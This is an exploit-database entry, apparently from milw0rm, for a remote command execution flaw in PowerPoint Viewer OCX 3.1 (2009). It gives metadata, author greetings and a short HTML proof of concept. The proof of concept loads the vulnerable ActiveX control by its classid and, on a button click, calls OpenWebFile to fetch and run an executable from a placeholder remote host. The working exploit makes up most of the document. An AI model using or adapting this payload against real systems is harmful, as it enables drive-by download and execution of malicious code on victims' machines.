PowerPoint Viewer OCX 3.1 - Remote Command Execution
Author: Cyber-Zone
type: remote
platform: windows
port:
date_added: 2009-01-12
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
PowerPoint Viewer OCX v3.1 Remote File Execution Exploit
Founded By : Cyber-Zone
E-mail : Paradis_des_fous@hotmail.fr
Home : WwW.Exploiter5.CoM
GreetZ : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum
<HTML>
<BODY>
<object id=Cyb classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>
<SCRIPT>
function Do_it()
{
File = "http://test.com/file.exe"
Cyb.OpenWebFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>
# milw0rm.com [2009-01-13]